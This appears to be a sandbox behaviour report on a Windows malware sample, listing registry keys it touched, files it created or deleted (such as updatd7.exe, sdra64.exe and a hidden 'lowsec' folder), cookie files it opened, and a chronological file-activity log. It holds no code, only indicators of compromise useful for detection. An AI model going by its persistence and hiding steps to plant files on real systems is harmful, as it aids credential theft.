HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
Enums HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptographyOID
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptographyOIDEncodingType 0CertDllOpenStoreProv
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile
HKEY_CURRENT_USERIdentities
File Changes by all processes
New Files DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSupdatd7.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
DeviceTcp6
DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F}
C:WINDOWSsystem32lowseclocal.ds
C:WINDOWSsystem32lowsecuser.ds.lll
C:WINDOWSsystem32lowsecuser.ds.lll
DeviceTcp
DeviceIp
DeviceIp
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
C:Windowslogfile32.txt
C:WINDOWSsystem32lowsecuser.ds
C:WINDOWSsystem32sdra64.exe
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSWindowsUpdate.log
DeviceTcp
DeviceIp
DeviceIp
Opened Files .PIPElsarpc
c:autoexec.bat
.Ip
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWS
.PIPEROUTER
.PIPEROUTER
.Ip
c:autoexec.bat
.Ip6
.pipe_AVIRA_2109
.pipe_AVIRA_2108
C:WINDOWSsystem32lowseclocal.ds
DeviceRdpDr
.PIPEwkssvc
.shadow
.PIPEDAV RPC SERVICE
.PIPElsarpc
c:autoexec.bat
.PIPEROUTER
.Ip
.PIPElsarpc
.Ip
c:autoexec.bat
.PIPEROUTER
C:Windowslogfile32.txt
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.pipe_AVIRA_2108
C:Dokumente und EinstellungenAdministratorCookiesadministrator@apmebf[1].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@bluekai[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@nonstoppartner[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[3].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@at.atwola[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[5].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[1].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@emjcd[1].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@mail.google[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@doubleclick[1].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@www.google[1].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@burstnet[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@fastclick[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@advertising[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@google[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@quantserve[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@microsoft[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@malektips[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@www.burstnet[2].txt
C:Dokumente und EinstellungenAdministratorCookiesadministrator@tacoda[1].txt
.pipe_AVIRA_2109
C:WINDOWSsystem32lowseclocal.ds
.PIPElsarpc
C:WINDOWSsystem32sdra64.exe
C:WINDOWSsystem32ntdll.dll
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
.PIPEEVENTLOG
.PIPElsarpc
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
.PIPEEVENTLOG
.PIPElsarpc
.pipe_AVIRA_2108
C:WINDOWSRegistrationR000000000007.clb
c:dokumente und einstellungenadministratorntuser.ini
c:Dokumente und EinstellungenAdministratorntuser.ini
.PIPElsarpc
.pipe_AVIRA_2108
C:WINDOWSRegistrationR000000000007.clb
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
.PIPEEVENTLOG
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
.PIPEEVENTLOG
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
.PIPEEVENTLOG
.Ip
.PIPElsarpc
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
C:WINDOWSSoftwareDistributionDataStoreLogsedb.log
Deleted Files C:WINDOWSsystem32lowseclocal.ds
C:WINDOWSsystem32lowsecuser.ds.lll
C:WINDOWSsystem32sdra64.exe
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
C:WINDOWSSoftwareDistributionDataStoreLogsedbtmp.log
Chronological Order Get File Attributes: WINDOWSSYSTEM32 Flags: (SECURITY_ANONYMOUS)
Get File Attributes: WINDOWSSYSTEM32 Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Get File Attributes: C:WINDOWSupdatd7.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:f0a88c1cab119d85ffa48c46199ea6d9 to C:WINDOWSupdatd7.exe
Set File Attributes: C:WINDOWSupdatd7.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWS ()
Find File: C:WINDOWSupdatd7.exe
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:WINDOWSsystem32configsystemprofileAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
Create/Open File: DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F} (OPEN_ALWAYS)
Open File: .Ip6 (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32lowsec Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: .pipe_AVIRA_2109 (OPEN_EXISTING)
